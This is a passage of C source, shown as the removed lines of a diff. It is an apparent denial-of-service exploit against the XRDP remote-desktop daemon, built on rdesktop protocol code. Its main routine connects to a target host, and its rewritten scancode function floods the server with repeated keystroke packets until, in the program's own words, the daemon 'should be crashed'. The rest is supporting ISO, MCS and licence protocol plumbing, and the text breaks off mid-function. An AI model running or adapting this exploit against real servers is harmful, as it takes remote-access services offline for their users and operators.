-#define RDP_CAPLEN_BITMAP 0x1C -#define RDP_CAPSET_ORDER 3 -#define RDP_CAPLEN_ORDER 0x58 -#define ORDER_CAP_NEGOTIATE 2 -#define ORDER_CAP_NOSUPPORT 4 -#define RDP_CAPSET_BMPCACHE 4 -#define RDP_CAPLEN_BMPCACHE 0x28 -#define RDP_CAPSET_CONTROL 5 -#define RDP_CAPLEN_CONTROL 0x0C -#define RDP_CAPSET_ACTIVATE 7 -#define RDP_CAPLEN_ACTIVATE 0x0C -#define RDP_CAPSET_POINTER 8 -#define RDP_CAPLEN_POINTER 0x08 -#define RDP_CAPSET_SHARE 9 -#define RDP_CAPLEN_SHARE 0x08 -#define RDP_CAPSET_COLCACHE 10 -#define RDP_CAPLEN_COLCACHE 0x08 -#define RDP_CAPSET_UNKNOWN 13 -#define RDP_CAPLEN_UNKNOWN 0x9C -#define RDP_SOURCE "MSTSC" - -/* Logon flags */ -#define RDP_LOGON_NORMAL 0x33 -#define RDP_LOGON_AUTO 0x8 - -/* Keymap flags */ -#define MapRightShiftMask (1<<0) -#define MapLeftShiftMask (1<<1) -#define MapShiftMask (MapRightShiftMask | MapLeftShiftMask) -#define MapRightAltMask (1<<2) -#define MapLeftAltMask (1<<3) -#define MapAltGrMask MapRightAltMask -#define MapRightCtrlMask (1<<4) -#define MapLeftCtrlMask (1<<5) -#define MapCtrlMask (MapRightCtrlMask | MapLeftCtrlMask) -#define MapRightWinMask (1<<6) -#define MapLeftWinMask (1<<7) -#define MapWinMask (MapRightWinMask | MapLeftWinMask) -#define MapNumLockMask (1<<8) -#define MapCapsLockMask (1<<9) -#define MapLocalStateMask (1<<10) -#define MapInhibitMask (1<<11) -#define MASK_ADD_BITS(var, mask) (var |= mask) -#define MASK_REMOVE_BITS(var, mask) (var &= ~mask) -#define MASK_HAS_BITS(var, mask) ((var & mask)>0) -#define MASK_CHANGE_BIT(var, mask, active) (var = ((var & ~mask) | (active ? 
mask : 0))) - -/* Parser state */ -typedef struct stream -{ - unsigned char *p; - unsigned char *end; - unsigned char *data; - unsigned int size; - - /* Offsets of various headers */ - unsigned char *iso_hdr; - unsigned char *mcs_hdr; - unsigned char *sec_hdr; - unsigned char *rdp_hdr; - -} - *STREAM; - -#define s_push_layer(s,h,n) { (s)->h = (s)->p; (s)->p += n; } -#define s_pop_layer(s,h) (s)->p = (s)->h; -#define s_mark_end(s) (s)->end = (s)->p; -#define s_check(s) ((s)->p <= (s)->end) -#define s_check_rem(s,n) ((s)->p + n <= (s)->end) -#define s_check_end(s) ((s)->p == (s)->end) -#if defined(L_ENDIAN) && !defined(NEED_ALIGN) -#define in_uint16_le(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } -#define in_uint32_le(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } -#define out_uint16_le(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } -#define out_uint32_le(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } -#else -#define in_uint16_le(s,v) { v = *((s)->p++); v += *((s)->p++) << 8; } -#define in_uint32_le(s,v) { in_uint16_le(s,v) \ - v += *((s)->p++) << 16; v += *((s)->p++) << 24; } -#define out_uint16_le(s,v) { *((s)->p++) = (v) & 0xff; *((s)->p++) = ((v) >> 8) & 0xff; } -#define out_uint32_le(s,v) { out_uint16_le(s, (v) & 0xffff); out_uint16_le(s, ((v) >> 16) & 0xffff); } -#endif -#if defined(B_ENDIAN) && !defined(NEED_ALIGN) -#define in_uint16_be(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } -#define in_uint32_be(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } -#define out_uint16_be(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } -#define out_uint32_be(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } -#define B_ENDIAN_PREFERRED -#define in_uint16(s,v) in_uint16_be(s,v) -#define in_uint32(s,v) in_uint32_be(s,v) -#define out_uint16(s,v) out_uint16_be(s,v) -#define out_uint32(s,v) out_uint32_be(s,v) -#else -#define next_be(s,v) v = ((v) << 8) + *((s)->p++); -#define in_uint16_be(s,v) { v = *((s)->p++); next_be(s,v); } -#define in_uint32_be(s,v) { in_uint16_be(s,v); 
next_be(s,v); next_be(s,v); } -#define out_uint16_be(s,v) { *((s)->p++) = ((v) >> 8) & 0xff; *((s)->p++) = (v) & 0xff; } -#define out_uint32_be(s,v) { out_uint16_be(s, ((v) >> 16) & 0xffff); out_uint16_be(s, (v) & 0xffff); } -#endif -#ifndef B_ENDIAN_PREFERRED -#define in_uint16(s,v) in_uint16_le(s,v) -#define in_uint32(s,v) in_uint32_le(s,v) -#define out_uint16(s,v) out_uint16_le(s,v) -#define out_uint32(s,v) out_uint32_le(s,v) -#endif -#define in_uint8(s,v) v = *((s)->p++); -#define in_uint8p(s,v,n) { v = (s)->p; (s)->p += n; } -#define in_uint8a(s,v,n) { memcpy(v,(s)->p,n); (s)->p += n; } -#define in_uint8s(s,n) (s)->p += n; -#define out_uint8(s,v) *((s)->p++) = v; -#define out_uint8p(s,v,n) { memcpy((s)->p,v,n); (s)->p += n; } -#define out_uint8a(s,v,n) out_uint8p(s,v,n); -#define out_uint8s(s,n) { memset((s)->p,0,n); (s)->p += n; } -#define SCANCODE_EXTENDED 0x80 -#define SCANCODE_KEY_44 0x2a -#define SCANCODE_CHAR_LSHIFT SCANCODE_KEY_44 -#define SCANCODE_KEY_57 0x36 -#define SCANCODE_CHAR_RSHIFT SCANCODE_KEY_57 -#define SCANCODE_KEY_58 0x1d -#define SCANCODE_CHAR_LCTRL SCANCODE_KEY_58 -#define SCANCODE_KEY_60 0x38 -#define SCANCODE_CHAR_LALT SCANCODE_KEY_60 -#define SCANCODE_KEY_62 (SCANCODE_EXTENDED | 0x38) -#define SCANCODE_CHAR_RALT SCANCODE_KEY_62 -#define SCANCODE_KEY_64 (SCANCODE_EXTENDED | 0x1d) -#define SCANCODE_CHAR_RCTRL SCANCODE_KEY_64 -#define SCANCODE_KEY_90 0x45 -#define SCANCODE_CHAR_NUMLOCK SCANCODE_KEY_90 -#define SCANCODE_KEY_110 0x1 -#define SCANCODE_CHAR_ESC SCANCODE_KEY_110 -#define SCANCODE_CHAR_LWIN (SCANCODE_EXTENDED | 0x5b) -#define SCANCODE_CHAR_RWIN (SCANCODE_EXTENDED | 0x5c) -#define s_push_layer(s,h,n) { (s)->h = (s)->p; (s)->p += n; } -#define s_pop_layer(s,h) (s)->p = (s)->h; -#define s_mark_end(s) (s)->end = (s)->p; -#define s_check(s) ((s)->p <= (s)->end) -#define s_check_rem(s,n) ((s)->p + n <= (s)->end) -#define s_check_end(s) ((s)->p == (s)->end) -#define RDP_ORDER_STANDARD 0x01 -#define RDP_ORDER_SECONDARY 0x02 -#define 
RDP_ORDER_BOUNDS 0x04
-#define RDP_ORDER_CHANGE 0x08
-#define RDP_ORDER_DELTA 0x10
-#define RDP_ORDER_LASTBOUNDS 0x20
-#define RDP_ORDER_SMALL 0x40
-#define RDP_ORDER_TINY 0x80
-#define MAX_TEXT 256
-#define MAX_DATA 256
-
-enum RDP_ORDER_TYPE
-{
- RDP_ORDER_DESTBLT = 0,
- RDP_ORDER_PATBLT = 1,
- RDP_ORDER_SCREENBLT = 2,
- RDP_ORDER_LINE = 9,
- RDP_ORDER_RECT = 10,
- RDP_ORDER_DESKSAVE = 11,
- RDP_ORDER_MEMBLT = 13,
- RDP_ORDER_TRIBLT = 14,
- RDP_ORDER_POLYLINE = 22,
- RDP_ORDER_TEXT2 = 27
-};
-
-typedef struct _POLYLINE_ORDER
-{
- uint16 x;
- uint16 y;
- uint8 opcode;
- uint8 fgcolour;
- uint8 lines;
- uint8 datasize;
- uint8 data[MAX_DATA];
-
-}
-POLYLINE_ORDER;
-
-typedef struct _DESTBLT_ORDER
-{
- uint16 x;
- uint16 y;
- uint16 cx;
- uint16 cy;
- uint8 opcode;
-
-}
-DESTBLT_ORDER;
-
-typedef struct _PATBLT_ORDER
-{
- uint16 x;
- uint16 y;
- uint16 cx;
- uint16 cy;
- uint8 opcode;
- uint8 bgcolour;
- uint8 fgcolour;
- BRUSH brush;
-
-}
-PATBLT_ORDER;
-
-typedef struct _SCREENBLT_ORDER
-{
- uint16 x;
- uint16 y;
- uint16 cx;
- uint16 cy;
- uint8 opcode;
- uint16 srcx;
- uint16 srcy;
-
-}
-SCREENBLT_ORDER;
-
-typedef struct _LINE_ORDER
-{
- uint16 mixmode;
- uint16 startx;
- uint16 starty;
- uint16 endx;
- uint16 endy;
- uint8 bgcolour;
- uint8 opcode;
- PEN pen;
-
-}
-LINE_ORDER;
-
-typedef struct _RECT_ORDER
-{
- uint16 x;
- uint16 y;
- uint16 cx;
- uint16 cy;
- uint8 colour;
-
-}
-RECT_ORDER;
-
-typedef struct _DESKSAVE_ORDER
-{
- uint32 offset;
- uint16 left;
- uint16 top;
- uint16 right;
- uint16 bottom;
- uint8 action;
-
-}
-DESKSAVE_ORDER;
-
-typedef struct _MEMBLT_ORDER
-{
- uint8 colour_table;
- uint8 cache_id;
- uint16 x;
- uint16 y;
- uint16 cx;
- uint16 cy;
- uint8 opcode;
- uint16 srcx;
- uint16 srcy;
- uint16 cache_idx;
-
-}
-MEMBLT_ORDER;
-
-
-typedef struct _TRIBLT_ORDER
-{
- uint8 colour_table;
- uint8 cache_id;
- uint16 x;
- uint16 y;
- uint16 cx;
- uint16 cy;
- uint8 opcode;
- uint16 srcx;
- uint16 srcy;
- uint8 bgcolour;
- uint8 fgcolour;
- 
BRUSH brush;
- uint16 cache_idx;
- uint16 unknown;
-
-}
-TRIBLT_ORDER;
-
-typedef struct _TEXT2_ORDER
-{
- uint8 font;
- uint8 flags;
- uint8 mixmode;
- uint8 unknown;
- uint8 fgcolour;
- uint8 bgcolour;
- uint16 clipleft;
- uint16 cliptop;
- uint16 clipright;
- uint16 clipbottom;
- uint16 boxleft;
- uint16 boxtop;
- uint16 boxright;
- uint16 boxbottom;
- uint16 x;
- uint16 y;
- uint8 length;
- uint8 text[MAX_TEXT];
-
-}
-TEXT2_ORDER;
-
-typedef struct _RDP_ORDER_STATE
-{
- uint8 order_type;
- BOUNDS bounds;
-
- DESTBLT_ORDER destblt;
- PATBLT_ORDER patblt;
- SCREENBLT_ORDER screenblt;
- LINE_ORDER line;
- RECT_ORDER rect;
- DESKSAVE_ORDER desksave;
- MEMBLT_ORDER memblt;
- TRIBLT_ORDER triblt;
- POLYLINE_ORDER polyline;
- TEXT2_ORDER text2;
-
-}
-RDP_ORDER_STATE;
-//End typedefs and structs
-
-
-// Begin XRDP global variables
-//mcs.c
-uint16 mcs_userid;
-
-//xkeymap.c
-#define KEYMAP_SIZE 0xffff+1
-#define KEYMAP_MASK 0xffff
-#define KEYMAP_MAX_LINE_LENGTH 80
-extern Display *display;
-extern BOOL enable_compose;
-static BOOL keymap_loaded;
-static key_translation keymap[KEYMAP_SIZE];
-static int min_keycode;
-static uint16 remote_modifier_state = 0;
-static void update_modifier_state(uint8 scancode, BOOL pressed);
-
-//license.c
-static uint8 licence_key[16];
-static uint8 licence_sign_key[16];
-BOOL licence_issued = False;
-
-//rdp.c
-extern uint16 mcs_userid;
-extern BOOL bitmap_compression;
-extern BOOL orders;
-extern BOOL encryption;
-extern BOOL desktop_save;
-uint8 *next_packet;
-uint32 rdp_shareid;
-
-//orders.c
-extern uint8 *next_packet;
-static RDP_ORDER_STATE order_state;
-
-//secure.c
-extern int width;
-extern int height;
-extern BOOL encryption;
-extern BOOL licence_issued;
-static int rc4_key_len;
-static RC4_KEY rc4_decrypt_key;
-static RC4_KEY rc4_encrypt_key;
-static uint8 sec_sign_key[16];
-static uint8 sec_decrypt_key[16];
-static uint8 sec_encrypt_key[16];
-static uint8 sec_decrypt_update_key[16];
-static uint8 sec_encrypt_update_key[16];
-static uint8 sec_crypted_random[SEC_MODULUS_SIZE];
-
-//tcp.c
-static int sock;
-static struct stream in;
-static struct stream out;
-extern int tcp_port_rdp;
-
-//xwin.c
-static int x_socket;
-static int ix = 36; // We force the program to interact
- // with X windows as little as possible
- // with this counter.
-//rdesktop.c
-char title[32] = "";
-char username[16];
-char hostname[16];
-char keymapname[16];
-int keylayout = 0x409;
-int width = 800;
-int height = 600;
-int tcp_port_rdp = TCP_PORT_RDP;
-BOOL bitmap_compression = True;
-BOOL sendmotion = True;
-BOOL orders = True;
-BOOL encryption = True;
-BOOL desktop_save = True;
-BOOL fullscreen = False;
-BOOL grab_keyboard = True;
-BOOL hide_decorations = False;
-extern BOOL owncolmap;
-// End global variables
-
-
-
-//Start function definitions
-static BOOL mcs_recv_aucf(uint16 * mcs_userid);
-static BOOL mcs_recv_cjcf(void);
-static BOOL mcs_recv_connect_response(STREAM mcs_data);
-static void rdp_send_synchronise(void);
-static void mcs_send_aurq(void);
-static void mcs_send_cjrq(uint16 chanid);
-static void mcs_send_connect_initial(STREAM mcs_data);
-static void mcs_send_edrq(void);
-static void process_secondary_order(STREAM s);
-static void process_update_pdu(STREAM s);
-static STREAM rdp_recv(uint8 * type);
-static void rdp_send_control(uint16 action);
-static void rdp_send_fonts(uint16 seq);
-static void rdp_send_confirm_active(void);
-static void reverse(uint8 * p, int len);
-STREAM sec_init(uint32 flags, int maxlen);
-STREAM sec_recv(void);
-STREAM tcp_init(int maxlen);
-STREAM tcp_recv(int length);
-int ui_select(int rdp_socket);
-void * xmalloc(int size);
-key_translation xkeymap_translate_key(uint32 keysym, unsigned int keycode, unsigned int state);
-//End function definitions
-
-
-
-int main(int argc, char *argv[])
-{
- char server[64];
- char fullhostname[64];
- char domain[16];
- char password[16];
- char shell[128];
- char directory[32];
- BOOL prompt_password;
- struct passwd *pw;
- uint32 
flags;
- char *p;
- int c;
- int username_option = 0;
- encryption = False;
- sendmotion = False;
- flags = RDP_LOGON_NORMAL;
- prompt_password = False;
- domain[0] = password[0] = shell[0] = directory[0] = 0;
- strcpy(keymapname, "en-us");
-
- if (argc == 1)
- {
- fprintf(stderr, "\n[=] Usage: %s \n\n", argv[0]);
- return 0;
- }
-
- strncpy(server, argv[1], sizeof(server));
- if(!rdp_connect(server, flags, domain, password, shell, directory))
- return 0;
-
- fprintf(stderr, "\n[=] Connected to %s\n", argv[1]);
- fprintf(stderr, "[=] Hit CTRL-C if the progress bar stops.\n\n");
-
- memset(password, 0, sizeof(password));
- rdp_main_loop();
- fprintf(stderr, "\n[=] Done. Check port 3389 on the remote host.\n\n");
- return 0;
-}
-
-
-void rdp_send_scancode(uint32 time, uint16 flags, uint8 scancode)
-{
- update_modifier_state(scancode, !(flags & RDP_KEYRELEASE));
- int c1, c2 = 1;
- scancode = '\x1e'; // 0x1e = 0x61 ("A" after parsing.
-
- fprintf(stderr, "\tBe patient! It takes about a minute, the RDP packets\n");
- fprintf(stderr, "\tneed to be sent spaced apart or the daemon discards them.\n\n");
- fprintf(stderr, "[=] Progress: ");
-
- for (c1 = 1 ; c1 < 100 ; c1++)
- {
- for (c2 = 1 ; c2 < 5 ; c2++)
- {
- //printf("Sending scancode=0x%x, flags=0x%x\n", scancode, flags);
- rdp_send_input(time, RDP_INPUT_SCANCODE, flags, scancode, 0);
- //scancode++;
- }
-
- fprintf(stderr, "*");
- sleep(1);
- }
-
- fprintf(stderr, "\n[=] The XRDP daemon on target host should be crashed.\n");
- rdp_disconnect();
- exit(1);
-}
-
-
-/* Output an ASN.1 BER header */
-static void
-ber_out_header(STREAM s, int tagval, int length)
-{
- if (tagval > 0xff)
- {
- out_uint16_be(s, tagval);
- }
- else
- {
- out_uint8(s, tagval);
- }
-
- if (length >= 0x80)
- {
- out_uint8(s, 0x82);
- out_uint16_be(s, length);
- }
- else
- out_uint8(s, length);
-}
-
-/* Output an ASN.1 BER integer */
-static void
-ber_out_integer(STREAM s, int value)
-{
- ber_out_header(s, BER_TAG_INTEGER, 2);
- 
out_uint16_be(s, value);
-}
-
-
-/* Parse an ASN.1 BER header */
-static BOOL
-ber_parse_header(STREAM s, int tagval, int *length)
-{
- int tag, len;
-
- if (tagval > 0xff)
- {
- in_uint16_be(s, tag);
- }
- else
- {
- in_uint8(s, tag)}
-
-
- if (tag != tagval)
- {
- error("expected tag %d, got %d\n", tagval, tag);
- return False;
- }
-
-
- in_uint8(s, len);
-
- if (len & 0x80)
- {
- len &= ~0x80;
- *length = 0;
- while (len--)
- next_be(s, *length);
- }
- else
- *length = len;
-
- return s_check(s);
-}
-
-
-
-void
-ensure_remote_modifiers(uint32 ev_time, key_translation tr)
-{
- /* If this key is a modifier, do nothing */
- switch (tr.scancode)
- {
- case SCANCODE_CHAR_LSHIFT:
- case SCANCODE_CHAR_RSHIFT:
- case SCANCODE_CHAR_LCTRL:
- case SCANCODE_CHAR_RCTRL:
- case SCANCODE_CHAR_LALT:
- case SCANCODE_CHAR_RALT:
- case SCANCODE_CHAR_LWIN:
- case SCANCODE_CHAR_RWIN:
- case SCANCODE_CHAR_NUMLOCK:
- return;
- default:
- break;
- }
-
- /* Shift. Left shift and right shift are treated as equal; either is fine. */
- if (MASK_HAS_BITS(tr.modifiers, MapShiftMask)
- != MASK_HAS_BITS(remote_modifier_state, MapShiftMask))
- {
- /* The remote modifier state is not correct */
- if (MASK_HAS_BITS(tr.modifiers, MapLeftShiftMask))
- {
- /* Needs left shift. Send down. */
- rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_LSHIFT);
- }
- else if (MASK_HAS_BITS(tr.modifiers, MapRightShiftMask))
- {
- /* Needs right shift. Send down. */
- rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_RSHIFT);
- }
- else
- {
- /* Should not use this modifier. Send up for shift currently pressed. 
*/
- if (MASK_HAS_BITS(remote_modifier_state, MapLeftShiftMask))
- /* Left shift is down */
- rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_LSHIFT);
- else
- /* Right shift is down */
- rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_RSHIFT);
- }
- }
-
- /* AltGr */
- if (MASK_HAS_BITS(tr.modifiers, MapAltGrMask)
- != MASK_HAS_BITS(remote_modifier_state, MapAltGrMask))
- {
- /* The remote modifier state is not correct */
- if (MASK_HAS_BITS(tr.modifiers, MapAltGrMask))
- {
- /* Needs this modifier. Send down. */
- rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_RALT);
- }
- else
- {
- /* Should not use this modifier. Send up. */
- rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_RALT);
- }
- }
-
- /* NumLock */
- if (MASK_HAS_BITS(tr.modifiers, MapNumLockMask)
- != MASK_HAS_BITS(remote_modifier_state, MapNumLockMask))
- {
- /* The remote modifier state is not correct */
- uint16 new_remote_state = 0;
-
- if (MASK_HAS_BITS(tr.modifiers, MapNumLockMask))
- {
-
- new_remote_state |= KBD_FLAG_NUMLOCK;
- }
- else
- {
-
- }
-
- rdp_send_input(0, RDP_INPUT_SYNCHRONIZE, 0, new_remote_state, 0);
- update_modifier_state(SCANCODE_CHAR_NUMLOCK, True);
- }
-}
-
-
-#ifdef EGD_SOCKET
-/* Read 32 random bytes from PRNGD or EGD socket (based on OpenSSL RAND_egd) */
-static BOOL
-generate_random_egd(uint8 * buf)
-{
- struct sockaddr_un addr;
- BOOL ret = False;
- int fd;
-
- fd = socket(AF_UNIX, SOCK_STREAM, 0);
- if (fd == -1)
- return False;
-
- addr.sun_family = AF_UNIX;
- memcpy(addr.sun_path, EGD_SOCKET, sizeof(EGD_SOCKET));
- if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1)
- goto err;
-
- /* PRNGD and EGD use a simple communications protocol */
- buf[0] = 1; /* Non-blocking (similar to /dev/urandom) */
- buf[1] = 32; /* Number of requested random bytes */
- if (write(fd, buf, 2) != 2)
- goto err;
-
- if ((read(fd, buf, 1) != 1) || (buf[0] == 0)) /* Available? 
*/
- goto err;
-
- if (read(fd, buf, 32) != 32)
- goto err;
-
- ret = True;
-
- err:
- close(fd);
- return ret;
-}
-#endif
-
-
-/* Handles, for example, multi-scancode keypresses (which is not
- possible via keymap-files) */
-BOOL
-handle_special_keys(uint32 keysym, unsigned int state, uint32 ev_time, BOOL pressed)
-{
- switch (keysym)
- {
-
-
- case XK_Break:
- /* Send Break sequence E0 46 E0 C6 */
- if (pressed)
- {
- rdp_send_scancode(ev_time, RDP_KEYPRESS,
- (SCANCODE_EXTENDED | 0x46));
- rdp_send_scancode(ev_time, RDP_KEYPRESS,
- (SCANCODE_EXTENDED | 0xc6));
- }
- /* No release sequence */
- return True;
-
- case XK_Pause:
- /* According to MS Keyboard Scan Code
- Specification, pressing Pause should result
- in E1 1D 45 E1 9D C5. I'm not exactly sure
- of how this is supposed to be sent via
- RDP. The code below seems to work, but with
- the side effect that Left Ctrl stays
- down. Therefore, we release it when Pause
- is released. */
- if (pressed)
- {
- rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xe1, 0);
- rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x1d, 0);
- rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x45, 0);
- rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xe1, 0);
- rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x9d, 0);
- rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xc5, 0);
- }
- else
- {
- /* Release Left Ctrl */
- rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYRELEASE,
- 0x1d, 0);
- }
- return True;
-
- case XK_Meta_L: /* Windows keys */
- case XK_Super_L:
- case XK_Hyper_L:
- case XK_Meta_R:
- case XK_Super_R:
- case XK_Hyper_R:
- if (pressed)
- {
- rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_LCTRL);
- rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_ESC);
- }
- else
- {
- rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_ESC);
- rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_LCTRL);
- }
- return True;
- }
- return False;
-}
- 
- - - - -/* Send a self-contained ISO PDU */ -static void -iso_send_msg(uint8 code) -{ - STREAM s; - - s = tcp_init(11); - - out_uint8(s, 3); /* version */ - out_uint8(s, 0); /* reserved */ - out_uint16_be(s, 11); /* length */ - - out_uint8(s, 6); /* hdrlen */ - out_uint8(s, code); - out_uint16(s, 0); /* dst_ref */ - out_uint16(s, 0); /* src_ref */ - out_uint8(s, 0); /* class */ - - s_mark_end(s); - tcp_send(s); -} - -/* Receive a message on the ISO layer, return code */ -static STREAM -iso_recv_msg(uint8 * code) -{ - STREAM s; - uint16 length; - uint8 version; - - s = tcp_recv(4); - if (s == NULL) - return NULL; - - in_uint8(s, version); - if (version != 3) - { - error("TPKT v%d\n", version); - return NULL; - } - - in_uint8s(s, 1); /* pad */ - in_uint16_be(s, length); - - s = tcp_recv(length - 4); - if (s == NULL) - return NULL; - - in_uint8s(s, 1); /* hdrlen */ - in_uint8(s, *code); - - if (*code == ISO_PDU_DT) - { - in_uint8s(s, 1); /* eot */ - return s; - } - - in_uint8s(s, 5); /* dst_ref, src_ref, class */ - return s; -} - -/* Initialise ISO transport data packet */ -STREAM -iso_init(int length) -{ - STREAM s; - - s = tcp_init(length + 7); - s_push_layer(s, iso_hdr, 7); - - return s; -} - -/* Send an ISO data PDU */ -void -iso_send(STREAM s) -{ - uint16 length; - - s_pop_layer(s, iso_hdr); - length = s->end - s->p; - - out_uint8(s, 3); /* version */ - out_uint8(s, 0); /* reserved */ - out_uint16_be(s, length); - - out_uint8(s, 2); /* hdrlen */ - out_uint8(s, ISO_PDU_DT); /* code */ - out_uint8(s, 0x80); /* eot */ - - tcp_send(s); -} - -/* Receive ISO transport data packet */ -STREAM -iso_recv(void) -{ - STREAM s; - uint8 code; - - s = iso_recv_msg(&code); - if (s == NULL) - return NULL; - - if (code != ISO_PDU_DT) - { - error("expected DT, got 0x%x\n", code); - return NULL; - } - - return s; -} - -/* Establish a connection up to the ISO layer */ -BOOL -iso_connect(char *server) -{ - uint8 code; - - if (!tcp_connect(server)) - return False; - - 
iso_send_msg(ISO_PDU_CR); - - if (iso_recv_msg(&code) == NULL) - return False; - - if (code != ISO_PDU_CC) - { - error("expected CC, got 0x%x\n", code); - tcp_disconnect(); - return False; - } - - return True; -} - -/* Disconnect from the ISO layer */ -void -iso_disconnect(void) -{ - iso_send_msg(ISO_PDU_DR); - tcp_disconnect(); -} - - - -/* Generate a session key and RC4 keys, given client and server randoms */ -static void -licence_generate_keys(uint8 * client_key, uint8 * server_key, uint8 * client_rsa) -{ - uint8 session_key[48]; - uint8 temp_hash[48]; - - /* Generate session key - two rounds of sec_hash_48 */ - sec_hash_48(temp_hash, client_rsa, client_key, server_key, 65); - sec_hash_48(session_key, temp_hash, server_key, client_key, 65); - - /* Store first 16 bytes of session key, for generating signatures */ - memcpy(licence_sign_key, session_key, 16); - - /* Generate RC4 key */ - sec_hash_16(licence_key, &session_key[16], client_key, server_key); -} - - - -/* Send a licence request packet */ -static void -licence_send_request(uint8 * client_random, uint8 * rsa_data, char *user, char *host) -{ - uint32 sec_flags = SEC_LICENCE_NEG; - uint16 userlen = strlen(user) + 1; - uint16 hostlen = strlen(host) + 1; - uint16 length = 128 + userlen + hostlen; - STREAM s; - - s = sec_init(sec_flags, length + 2); - - out_uint16_le(s, LICENCE_TAG_REQUEST); - out_uint16_le(s, length); - - out_uint32_le(s, 1); - out_uint16(s, 0); - out_uint16_le(s, 0xff01); - - out_uint8p(s, client_random, SEC_RANDOM_SIZE); - out_uint16(s, 0); - out_uint16_le(s, (SEC_MODULUS_SIZE + SEC_PADDING_SIZE)); - out_uint8p(s, rsa_data, SEC_MODULUS_SIZE); - out_uint8s(s, SEC_PADDING_SIZE); - - out_uint16(s, LICENCE_TAG_USER); - out_uint16(s, userlen); - out_uint8p(s, user, userlen); - - out_uint16(s, LICENCE_TAG_HOST); - out_uint16(s, hostlen); - out_uint8p(s, host, hostlen); - - s_mark_end(s); - sec_send(s, sec_flags); -} - -/* Process a licence demand packet */ -static void 
-licence_process_demand(STREAM s) -{ - uint8 null_data[SEC_MODULUS_SIZE]; - uint8 *server_random; -#ifdef SAVE_LICENCE - uint8 signature[LICENCE_SIGNATURE_SIZE]; - uint8 hwid[LICENCE_HWID_SIZE]; - uint8 *licence_data; - int licence_size; - RC4_KEY crypt_key; -#endif - - /* Retrieve the server random from the incoming packet */ - in_uint8p(s, server_random, SEC_RANDOM_SIZE); - - /* We currently use null client keys. This is a bit naughty but, hey, - the security of licence negotiation isn't exactly paramount. */ - memset(null_data, 0, sizeof(null_data)); - licence_generate_keys(null_data, server_random, null_data); - -#ifdef SAVE_LICENCE - licence_size = load_licence(&licence_data); - if (licence_size != -1) - { - /* Generate a signature for the HWID buffer */ - licence_generate_hwid(hwid); - sec_sign(signature, 16, licence_sign_key, 16, hwid, sizeof(hwid)); - - /* Now encrypt the HWID */ - RC4_set_key(&crypt_key, 16, licence_key); - RC4(&crypt_key, sizeof(hwid), hwid, hwid); - - licence_present(null_data, null_data, licence_data, licence_size, hwid, signature); - xfree(licence_data); - return; - } -#endif - - licence_send_request(null_data, null_data, username, hostname); -} - - -/* Process a licence packet */ -void -licence_process(STREAM s) -{ - uint16 tag; - - in_uint16_le(s, tag); - in_uint8s(s, 2); /* length */ - - switch (tag) - { - case LICENCE_TAG_DEMAND: - - licence_process_demand(s); - break; - - case LICENCE_TAG_AUTHREQ: -// licence_process_authreq(s); - break; - - case LICENCE_TAG_ISSUE: -// licence_process_issue(s); - break; - - case LICENCE_TAG_REISSUE: - break; - - case LICENCE_TAG_RESULT: - break; - - - } -} - - -/* Establish a connection up to the MCS layer */ -BOOL -mcs_connect(char *server, STREAM mcs_data) -{ - if (!iso_connect(server)) - return False; - - mcs_send_connect_initial(mcs_data); - if (!mcs_recv_connect_response(mcs_data)) - goto error; - - mcs_send_edrq(); - - mcs_send_aurq(); - if (!mcs_recv_aucf(&mcs_userid)) - goto error; - - 
mcs_send_cjrq(mcs_userid + 1001); - if (!mcs_recv_cjcf()) - goto error; - - mcs_send_cjrq(MCS_GLOBAL_CHANNEL); - if (!mcs_recv_cjcf()) - goto error; - - return True; - - error: - iso_disconnect(); - return False; -} - -/* Disconnect from the MCS layer */ -void -mcs_disconnect(void) -{ - iso_disconnect(); -} - - - -/* Initialise an MCS transport data packet */ -STREAM -mcs_init(int length) -{ - STREAM s; - - s = iso_init(length + 8); - s_push_layer(s, mcs_hdr, 8); - - return s; -} - - -/* Output a DOMAIN_PARAMS structure (ASN.1 BER) */ -static void -mcs_out_domain_params(STREAM s, int max_channels, int max_users, int max_tokens, int max_pdusize) -{ - ber_out_header(s, MCS_TAG_DOMAIN_PARAMS, 32); - ber_out_integer(s, max_channels); - ber_out_integer(s, max_users); - ber_out_integer(s, max_tokens); - ber_out_integer(s, 1); /* num_priorities */ - ber_out_integer(s, 0); /* min_throughput */ - ber_out_integer(s, 1); /* max_height */ - ber_out_integer(s, max_pdusize); - ber_out_integer(s, 2); /* ver_protocol */ -} - - - - -/* Receive an MCS transport data packet */ -STREAM -mcs_recv(void) -{ - uint8 opcode, appid, length; - STREAM s; - - s = iso_recv(); - if (s == NULL) - return NULL; - - in_uint8(s, opcode); - appid = opcode >> 2; - if (appid != MCS_SDIN) - { - if (appid != MCS_DPUM) - { - error("expected data, got %d\n", opcode); - } - return NULL; - } - - in_uint8s(s, 5); /* userid, chanid, flags 